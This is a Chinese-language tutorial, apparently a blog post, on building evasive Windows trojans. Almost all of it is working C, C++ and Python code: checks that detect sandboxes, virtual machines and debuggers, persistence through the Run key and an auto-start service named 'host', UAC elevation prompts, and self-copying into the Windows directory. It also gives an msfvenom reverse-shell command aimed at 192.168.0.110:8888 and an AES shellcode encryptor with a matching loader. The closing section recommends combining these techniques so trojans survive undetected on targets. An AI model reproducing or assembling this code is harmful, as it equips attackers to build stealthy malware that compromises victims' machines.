木马反制技术详解<\/h1>

反沙箱技术<\/h2>

沙箱检测原理<\/h3>
沙箱(Sandbox)是一种隔离机制，通过创建受控环境来分析恶意软件行为。国内常用云沙箱平台：<\/p>
微步在线：https:\/\/s.threatbook.com\/<\/li>
安恒云沙箱：https:\/\/sandbox.dbappsecurity.com.cn\/<\/li> <\/ul>
白名单检测实现<\/h3>
通过检测常用软件进程是否存在来判断是否运行在沙箱环境：<\/p>
#include<\/span> <windows.h><\/span>
<\/span><\/span><\/span>#include<\/span> <tlhelp32.h><\/span>
<\/span><\/span><\/span>#include<\/span> <stdio.h><\/span>
<\/span><\/span><\/span>#include<\/span> <stdbool.h><\/span>
<\/span><\/span><\/span><\/span>
<\/span><\/span>bool<\/span> is_process_running<\/span>(const<\/span> char<\/span>*<\/span> process_name) {
<\/span><\/span>    bool<\/span> found =<\/span> false;
<\/span><\/span>    HANDLE hProcessSnap;
<\/span><\/span>    PROCESSENTRY32 pe32;
<\/span><\/span>
<\/span><\/span>    hProcessSnap =<\/span> CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0<\/span>);
<\/span><\/span>    if<\/span> (hProcessSnap ==<\/span> INVALID_HANDLE_VALUE) {
<\/span><\/span>        return<\/span> false;
<\/span><\/span>    }
<\/span><\/span>
<\/span><\/span>    pe32.dwSize =<\/span> sizeof<\/span>(PROCESSENTRY32);
<\/span><\/span>
<\/span><\/span>    if<\/span> (!<\/span>Process32First(hProcessSnap, &<\/span>pe32)) {
<\/span><\/span>        CloseHandle(hProcessSnap);
<\/span><\/span>        return<\/span> false;
<\/span><\/span>    }
<\/span><\/span>
<\/span><\/span>    do<\/span> {
<\/span><\/span>        if<\/span> (strcmp(pe32.szExeFile, process_name) ==<\/span> 0<\/span>) {
<\/span><\/span>            found =<\/span> true;
<\/span><\/span>            break<\/span>;
<\/span><\/span>        }
<\/span><\/span>    } while<\/span> (Process32Next(hProcessSnap, &<\/span>pe32));
<\/span><\/span>
<\/span><\/span>    CloseHandle(hProcessSnap);
<\/span><\/span>    return<\/span> found;
<\/span><\/span>}
<\/span><\/span>
<\/span><\/span>int<\/span> main<\/span>() {
<\/span><\/span>    if<\/span> (!<\/span>is_process_running("qq.exe"<\/span>) &&<\/span> !<\/span>is_process_running("wechat.exe"<\/span>)) {
<\/span><\/span>        return<\/span> 0<\/span>; \/\/ 无常用软件进程，可能是沙箱，退出程序
<\/span><\/span><\/span><\/span>    }
<\/span><\/span>    return<\/span> 0<\/span>;
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>关键函数<\/strong>:<\/p>

CreateToolhelp32Snapshot<\/code>: 获取进程快照<\/li>
Process32First<\/code>\/Process32Next<\/code>: 遍历进程列表<\/li>
pe32.szExeFile<\/code>: 进程可执行文件名<\/li>
<\/ul>
反虚拟机技术<\/h2>
虚拟机检测方法<\/h3>
通过检查注册表中的硬件信息判断是否运行在虚拟机中：<\/p>
#include<\/span> <windows.h><\/span>
<\/span><\/span><\/span>#include<\/span> <stdio.h><\/span>
<\/span><\/span><\/span><\/span>
<\/span><\/span>int<\/span> IsRunningInVM<\/span>() {
<\/span><\/span>    char<\/span> szHardware[256<\/span>];
<\/span><\/span>    DWORD size =<\/span> sizeof<\/span>(szHardware);
<\/span><\/span>    int<\/span> isVM =<\/span> 0<\/span>;
<\/span><\/span>
<\/span><\/span>    \/\/ 检查IDE硬件信息
<\/span><\/span><\/span><\/span>    if<\/span> (RegGetValueA(HKEY_LOCAL_MACHINE, "SYSTEM<\/span>\\<\/span>CurrentControlSet<\/span>\\<\/span>Enum<\/span>\\<\/span>IDE"<\/span>, 
<\/span><\/span>        "HardwareID"<\/span>, RRF_RT_REG_SZ, NULL, szHardware, &<\/span>size) ==<\/span> ERROR_SUCCESS) {
<\/span><\/span>        if<\/span> (strstr(szHardware, "VMware"<\/span>) ||<\/span> strstr(szHardware, "Virtual"<\/span>)) {
<\/span><\/span>            isVM =<\/span> 1<\/span>;
<\/span><\/span>        }
<\/span><\/span>    }
<\/span><\/span>
<\/span><\/span>    \/\/ 检查磁盘枚举信息
<\/span><\/span><\/span><\/span>    size =<\/span> sizeof<\/span>(szHardware);
<\/span><\/span>    if<\/span> (RegGetValueA(HKEY_LOCAL_MACHINE, "SYSTEM<\/span>\\<\/span>CurrentControlSet<\/span>\\<\/span>Services<\/span>\\<\/span>Disk<\/span>\\<\/span>Enum"<\/span>, 
<\/span><\/span>        "0"<\/span>, RRF_RT_REG_SZ, NULL, szHardware, &<\/span>size) ==<\/span> ERROR_SUCCESS) {
<\/span><\/span>        if<\/span> (strstr(szHardware, "VMware"<\/span>) ||<\/span> strstr(szHardware, "VBOX"<\/span>)) {
<\/span><\/span>            isVM =<\/span> 1<\/span>;
<\/span><\/span>        }
<\/span><\/span>    }
<\/span><\/span>
<\/span><\/span>    return<\/span> isVM;
<\/span><\/span>}
<\/span><\/span>
<\/span><\/span>int<\/span> main<\/span>(int<\/span> argc, char<\/span> *<\/span>argv[]) {
<\/span><\/span>    if<\/span> (IsRunningInVM()) {
<\/span><\/span>        return<\/span> 0<\/span>; \/\/ 检测到虚拟机，退出程序
<\/span><\/span><\/span><\/span>    }
<\/span><\/span>    \/\/ 正常执行代码
<\/span><\/span><\/span><\/span>}
<\/span><\/span><\/code><\/pre>关键注册表路径<\/strong>:<\/p>

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\IDE<\/code><\/li>
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Disk\Enum<\/code><\/li>
<\/ul>
反调试技术<\/h2>
调试器检测<\/h3>
使用IsDebuggerPresent<\/code>函数检测是否被调试：<\/p>
#include<\/span> <windows.h><\/span>
<\/span><\/span><\/span>#include<\/span> <stdio.h><\/span>
<\/span><\/span><\/span><\/span>
<\/span><\/span>void<\/span> checkDebugger<\/span>() {
<\/span><\/span>    if<\/span> (IsDebuggerPresent()) {
<\/span><\/span>        ExitProcess(1<\/span>); \/\/ 检测到调试器，立即退出
<\/span><\/span><\/span><\/span>    }
<\/span><\/span>}
<\/span><\/span>
<\/span><\/span>int<\/span> main<\/span>() {
<\/span><\/span>    checkDebugger();
<\/span><\/span>    \/\/ 正常执行代码
<\/span><\/span><\/span><\/span>    return<\/span> 0<\/span>;
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>持久化技术<\/h2>
开机自启动注册表<\/h3>
通过注册表实现开机自启动：<\/p>
#include<\/span> <windows.h><\/span>
<\/span><\/span><\/span>#include<\/span> <stdio.h><\/span>
<\/span><\/span><\/span><\/span>
<\/span><\/span>void<\/span> add_to_startup<\/span>(const<\/span> char<\/span> *<\/span>appname, const<\/span> char<\/span> *<\/span>path) {
<\/span><\/span>    HKEY hKey;
<\/span><\/span>    LONG result;
<\/span><\/span>
<\/span><\/span>    result =<\/span> RegOpenKeyEx(HKEY_CURRENT_USER,
<\/span><\/span>                        "Software<\/span>\\<\/span>Microsoft<\/span>\\<\/span>Windows<\/span>\\<\/span>CurrentVersion<\/span>\\<\/span>Run"<\/span>,
<\/span><\/span>                        0<\/span>, KEY_SET_VALUE, &<\/span>hKey);
<\/span><\/span>
<\/span><\/span>    if<\/span> (result !=<\/span> ERROR_SUCCESS) {
<\/span><\/span>        return<\/span>;
<\/span><\/span>    }
<\/span><\/span>
<\/span><\/span>    result =<\/span> RegSetValueEx(hKey, appname, 0<\/span>, REG_SZ, 
<\/span><\/span>                         (BYTE *<\/span>)path, strlen(path) +<\/span> 1<\/span>);
<\/span><\/span>
<\/span><\/span>    RegCloseKey(hKey);
<\/span><\/span>}
<\/span><\/span>
<\/span><\/span>int<\/span> main<\/span>(int<\/span> argc, char<\/span> *<\/span>argv[]) {
<\/span><\/span>    char<\/span> path[MAX_PATH];
<\/span><\/span>    if<\/span> (GetModuleFileName(NULL, path, MAX_PATH) ==<\/span> 0<\/span>) {
<\/span><\/span>        return<\/span> 1<\/span>;
<\/span><\/span>    }
<\/span><\/span>    add_to_startup("MyAppName"<\/span>, path); \/\/ 添加到启动项
<\/span><\/span><\/span><\/span>}
<\/span><\/span><\/code><\/pre>关键注册表路径<\/strong>:

HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run<\/code><\/p>
Windows服务注册<\/h3>
通过创建服务实现持久化（需要管理员权限）：<\/p>
#include<\/span> <windows.h><\/span>
<\/span><\/span><\/span>#include<\/span> <string.h><\/span>
<\/span><\/span><\/span>#include<\/span> <stdlib.h><\/span>
<\/span><\/span><\/span>#include<\/span> <stdio.h><\/span>
<\/span><\/span><\/span>#include<\/span> <wincrypt.h><\/span>
<\/span><\/span><\/span>#include<\/span> <shlobj.h><\/span>
<\/span><\/span><\/span>#pragma comment(lib, "crypt32.lib")
<\/span><\/span><\/span>#pragma comment(lib, "advapi32.lib")
<\/span><\/span><\/span><\/span>
<\/span><\/span>void<\/span> CreateServiceToRunAtStartup<\/span>() {
<\/span><\/span>    SC_HANDLE schSCManager =<\/span> OpenSCManager(NULL, NULL, SC_MANAGER_CREATE_SERVICE);
<\/span><\/span>    if<\/span> (schSCManager ==<\/span> NULL) {
<\/span><\/span>        return<\/span>;
<\/span><\/span>    }
<\/span><\/span>
<\/span><\/span>    char<\/span> path[MAX_PATH];
<\/span><\/span>    SHGetSpecialFolderPath(NULL, path, CSIDL_WINDOWS, FALSE);
<\/span><\/span>    strcat(path, "<\/span>\\<\/span>host.exe"<\/span>);
<\/span><\/span>
<\/span><\/span>    SC_HANDLE schService =<\/span> CreateService(
<\/span><\/span>        schSCManager, 
<\/span><\/span>        "host"<\/span>,          \/\/ 服务名
<\/span><\/span><\/span><\/span>        "host"<\/span>,          \/\/ 显示名
<\/span><\/span><\/span><\/span>        SERVICE_ALL_ACCESS, 
<\/span><\/span>        SERVICE_WIN32_OWN_PROCESS, 
<\/span><\/span>        SERVICE_AUTO_START, \/\/ 自动启动
<\/span><\/span><\/span><\/span>        SERVICE_ERROR_NORMAL, 
<\/span><\/span>        path,           \/\/ 可执行文件路径
<\/span><\/span><\/span><\/span>        NULL, NULL, NULL, NULL, NULL);
<\/span><\/span>
<\/span><\/span>    if<\/span> (schService ==<\/span> NULL) {
<\/span><\/span>        CloseServiceHandle(schSCManager);
<\/span><\/span>        return<\/span>;
<\/span><\/span>    }
<\/span><\/span>
<\/span><\/span>    CloseServiceHandle(schService);
<\/span><\/span>    CloseServiceHandle(schSCManager);
<\/span><\/span>}
<\/span><\/span>
<\/span><\/span>int<\/span> main<\/span>(int<\/span> argc, char<\/span> *<\/span>argv[]) {
<\/span><\/span>    CreateServiceToRunAtStartup();
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>提权技术<\/h3>
弹窗请求管理员权限：<\/p>
#include<\/span> <windows.h><\/span>
<\/span><\/span><\/span>#include<\/span> <string.h><\/span>
<\/span><\/span><\/span>#include<\/span> <stdlib.h><\/span>
<\/span><\/span><\/span>#include<\/span> <stdio.h><\/span>
<\/span><\/span><\/span>#include<\/span> <wincrypt.h><\/span>
<\/span><\/span><\/span>#pragma comment(lib, "crypt32.lib")
<\/span><\/span><\/span><\/span>
<\/span><\/span>BOOL IsRunAsAdministrator<\/span>() {
<\/span><\/span>    BOOL fIsRunAsAdmin =<\/span> FALSE;
<\/span><\/span>    PSID pAdministratorsGroup =<\/span> NULL;
<\/span><\/span>
<\/span><\/span>    SID_IDENTIFIER_AUTHORITY NtAuthority =<\/span> SECURITY_NT_AUTHORITY;
<\/span><\/span>    if<\/span> (AllocateAndInitializeSid(&<\/span>NtAuthority, 2<\/span>, SECURITY_BUILTIN_DOMAIN_RID, 
<\/span><\/span>        DOMAIN_ALIAS_RID_ADMINS, 0<\/span>, 0<\/span>, 0<\/span>, 0<\/span>, 0<\/span>, 0<\/span>, &<\/span>pAdministratorsGroup)) {
<\/span><\/span>        CheckTokenMembership(NULL, pAdministratorsGroup, &<\/span>fIsRunAsAdmin);
<\/span><\/span>        FreeSid(pAdministratorsGroup);
<\/span><\/span>    }
<\/span><\/span>
<\/span><\/span>    return<\/span> fIsRunAsAdmin;
<\/span><\/span>}
<\/span><\/span>
<\/span><\/span>void<\/span> ElevatePrivileges<\/span>() {
<\/span><\/span>    if<\/span> (!<\/span>IsRunAsAdministrator()) {
<\/span><\/span>        char<\/span> szPath[MAX_PATH];
<\/span><\/span>        if<\/span> (GetModuleFileName(NULL, szPath, ARRAYSIZE(szPath))) {
<\/span><\/span>            SHELLEXECUTEINFO sei =<\/span> { sizeof<\/span>(sei) };
<\/span><\/span>            sei.lpVerb =<\/span> "runas"<\/span>; \/\/ 请求管理员权限
<\/span><\/span><\/span><\/span>            sei.lpFile =<\/span> szPath;
<\/span><\/span>            sei.hwnd =<\/span> NULL;
<\/span><\/span>            sei.nShow =<\/span> SW_NORMAL;
<\/span><\/span>            if<\/span> (!<\/span>ShellExecuteEx(&<\/span>sei)) {
<\/span><\/span>                exit(1<\/span>);
<\/span><\/span>            }
<\/span><\/span>            exit(0<\/span>);
<\/span><\/span>        }
<\/span><\/span>    }
<\/span><\/span>}
<\/span><\/span>
<\/span><\/span>int<\/span> main<\/span>(int<\/span> argc, char<\/span> *<\/span>argv[]) {
<\/span><\/span>    ElevatePrivileges();
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>隐藏技术<\/h2>
文件隐藏<\/h3>
将木马复制到系统目录并改名：<\/p>
#include<\/span> <windows.h><\/span>
<\/span><\/span><\/span>#include<\/span> <string.h><\/span>
<\/span><\/span><\/span>#include<\/span> <stdlib.h><\/span>
<\/span><\/span><\/span>#include<\/span> <stdio.h><\/span>
<\/span><\/span><\/span>#include<\/span> <wincrypt.h><\/span>
<\/span><\/span><\/span>#include<\/span> <shlobj.h><\/span>
<\/span><\/span><\/span>#pragma comment(lib, "crypt32.lib")
<\/span><\/span><\/span>#pragma comment(lib, "advapi32.lib")
<\/span><\/span><\/span><\/span>
<\/span><\/span>void<\/span> CopyFilesToWindowsDir<\/span>() {
<\/span><\/span>    char<\/span> srcPath[MAX_PATH], destPath[MAX_PATH];
<\/span><\/span>    GetModuleFileName(NULL, srcPath, MAX_PATH);
<\/span><\/span>    SHGetSpecialFolderPath(NULL, destPath, CSIDL_WINDOWS, FALSE);
<\/span><\/span>    strcat(destPath, "<\/span>\\<\/span>host.exe"<\/span>);
<\/span><\/span>    CopyFile(srcPath, destPath, FALSE); \/\/ 复制到Windows目录并改名
<\/span><\/span><\/span><\/span>}
<\/span><\/span>
<\/span><\/span>int<\/span> main<\/span>(int<\/span> argc, char<\/span> *<\/span>argv[]) {
<\/span><\/span>    CopyFilesToWindowsDir();
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>Shellcode混淆技术<\/h2>
AES加密Shellcode<\/h3>

生成原始Shellcode:<\/li>
<\/ol>
msfvenom -p windows\/x64\/shell_reverse_tcp lhost=<\/span>192.168.0.110 lport=<\/span>8888<\/span> -f raw -o msf.bin
<\/span><\/span><\/code><\/pre>
Python脚本加密Shellcode:<\/li>
<\/ol>
import<\/span> sys
<\/span><\/span>from<\/span> Crypto.Cipher import<\/span> AES
<\/span><\/span>from<\/span> Crypto.Util.Padding import<\/span> pad
<\/span><\/span>from<\/span> os import<\/span> urandom
<\/span><\/span>import<\/span> hashlib
<\/span><\/span>
<\/span><\/span>def<\/span> AESencrypt<\/span>(plaintext, key):
<\/span><\/span>    k =<\/span> hashlib.<\/span>sha256(KEY).<\/span>digest()
<\/span><\/span>    iv =<\/span> 16<\/span> *<\/span> b<\/span>'<\/span>\x00<\/span>'<\/span>
<\/span><\/span>    plaintext =<\/span> pad(plaintext, AES.<\/span>block_size)
<\/span><\/span>    cipher =<\/span> AES.<\/span>new(k, AES.<\/span>MODE_CBC, iv)
<\/span><\/span>    ciphertext =<\/span> cipher.<\/span>encrypt(plaintext)
<\/span><\/span>    return<\/span> ciphertext, key
<\/span><\/span>
<\/span><\/span>def<\/span> printResult<\/span>(key, ciphertext):
<\/span><\/span>    print('char AESkey[] = { 0x'<\/span> +<\/span> ', 0x'<\/span>.<\/span>join(hex(x)[2<\/span>:] for<\/span> x in<\/span> KEY) +<\/span> ' };'<\/span>)
<\/span><\/span>    print('unsigned char payload[] = { 0x'<\/span> +<\/span> ', 0x'<\/span>.<\/span>join(hex(x)[2<\/span>:] for<\/span> x in<\/span> ciphertext) +<\/span> ' };'<\/span>)
<\/span><\/span>
<\/span><\/span>try<\/span>:
<\/span><\/span>    file =<\/span> open(sys.<\/span>argv[1<\/span>], "rb"<\/span>)
<\/span><\/span>    content =<\/span> file.<\/span>read()
<\/span><\/span>except<\/span>:
<\/span><\/span>    print("Usage: .\AES_cryptor.py PAYLOAD_FILE"<\/span>)
<\/span><\/span>    sys.<\/span>exit()
<\/span><\/span>
<\/span><\/span>KEY =<\/span> urandom(16<\/span>)
<\/span><\/span>ciphertext, key =<\/span> AESencrypt(content, KEY)
<\/span><\/span>printResult(KEY, ciphertext)
<\/span><\/span><\/code><\/pre>
C++解密和执行Shellcode:<\/li>
<\/ol>
#include<\/span> <windows.h><\/span>
<\/span><\/span><\/span>#include<\/span> <string.h><\/span>
<\/span><\/span><\/span>#include<\/span> <stdlib.h><\/span>
<\/span><\/span><\/span>#include<\/span> <stdio.h><\/span>
<\/span><\/span><\/span>#include<\/span> <wincrypt.h><\/span>
<\/span><\/span><\/span>#include<\/span> <shlobj.h><\/span>
<\/span><\/span><\/span>#pragma comment(lib, "crypt32.lib")
<\/span><\/span><\/span>#pragma comment(lib, "advapi32.lib")
<\/span><\/span><\/span><\/span>
<\/span><\/span>void<\/span> aes<\/span>(char<\/span>*<\/span> code, DWORD codeLen, char<\/span>*<\/span> key, DWORD keyLen) {
<\/span><\/span>    HCRYPTPROV hProv;
<\/span><\/span>    HCRYPTHASH hHash;
<\/span><\/span>    HCRYPTKEY hKey;
<\/span><\/span>
<\/span><\/span>    if<\/span> (!<\/span>CryptAcquireContextW(&<\/span>hProv, NULL, NULL, PROV_RSA_AES, CRYPT_VERIFYCONTEXT)) {
<\/span><\/span>        return<\/span>;
<\/span><\/span>    }
<\/span><\/span>    if<\/span> (!<\/span>CryptCreateHash(hProv, CALG_SHA_256, 0<\/span>, 0<\/span>, &<\/span>hHash)) {
<\/span><\/span>        return<\/span>;
<\/span><\/span>    }
<\/span><\/span>    if<\/span> (!<\/span>CryptHashData(hHash, (BYTE*<\/span>)key, keyLen, 0<\/span>)) {
<\/span><\/span>        return<\/span>;
<\/span><\/span>    }
<\/span><\/span>    if<\/span> (!<\/span>CryptDeriveKey(hProv, CALG_AES_256, hHash, 0<\/span>, &<\/span>hKey)) {
<\/span><\/span>        return<\/span>;
<\/span><\/span>    }
<\/span><\/span>
<\/span><\/span>    if<\/span> (!<\/span>CryptDecrypt(hKey, (HCRYPTHASH)NULL, 0<\/span>, 0<\/span>, (BYTE*<\/span>)code, &<\/span>codeLen)) {
<\/span><\/span>        return<\/span>;
<\/span><\/span>    }
<\/span><\/span>
<\/span><\/span>    CryptReleaseContext(hProv, 0<\/span>);
<\/span><\/span>    CryptDestroyHash(hHash);
<\/span><\/span>    CryptDestroyKey(hKey);
<\/span><\/span>}
<\/span><\/span>
<\/span><\/span>int<\/span> main<\/span>(int<\/span> argc, char<\/span> *<\/span>argv[]) {
<\/span><\/span>    unsigned<\/span> char<\/span> key[] =<\/span> { 0xed<\/span>, 0x39<\/span>, 0x56<\/span>, 0x67<\/span>, 0xcd<\/span>, 0x62<\/span>, 0xf7<\/span>, 0x91<\/span>, 0x62<\/span>, 0xb<\/span>, 0x85<\/span>, 0x53<\/span>, 0x9b<\/span>, 0x17<\/span>, 0xae<\/span>, 0xc9<\/span> };
<\/span><\/span>    unsigned<\/span> char<\/span> code[] =<\/span> {0xa0<\/span>, 0x82<\/span>, 0xa3<\/span>, 0xbf<\/span>, 0xce<\/span>, 0xd5<\/span>, 0xd5<\/span>, 0xce<\/span>, 0x0<\/span>, 0xf8<\/span>, 0xc1<\/span>, 0x34<\/span>, 0x7f<\/span>, 0x39<\/span>, 0xcf<\/span>, 0xdb<\/span>, \/*...*\/<\/span>};
<\/span><\/span>    
<\/span><\/span>    DWORD code_length =<\/span> sizeof<\/span>(code);
<\/span><\/span>    aes((char<\/span>*<\/span>)code, code_length, key, sizeof<\/span>(key));
<\/span><\/span>    \/\/ 解密后执行Shellcode
<\/span><\/span><\/span><\/span>}
<\/span><\/span><\/code><\/pre>关键加密函数<\/strong>:<\/p>

CryptAcquireContextW<\/code>: 获取加密服务提供程序<\/li>
CryptCreateHash<\/code>: 创建哈希对象<\/li>
CryptHashData<\/code>: 哈希数据<\/li>
CryptDeriveKey<\/code>: 派生密钥<\/li>
CryptDecrypt<\/code>: 解密数据<\/li>
<\/ul>
总结<\/h2>
本文详细介绍了木马程序常用的反制技术，包括：<\/p>

反沙箱检测 - 通过白名单进程检测<\/li>
反虚拟机检测 - 通过注册表硬件信息检测<\/li>
反调试技术 - 使用IsDebuggerPresent检测<\/li>
持久化技术 - 注册表启动项和服务注册<\/li>
提权技术 - UAC弹窗请求管理员权限<\/li>
隐藏技术 - 复制到系统目录并改名<\/li>
Shellcode混淆 - AES加密\/解密技术<\/li>
<\/ol>
这些技术可以组合使用，提高木马程序的隐蔽性和生存能力。在实际应用中，应根据目标环境选择合适的反制技术组合。<\/p>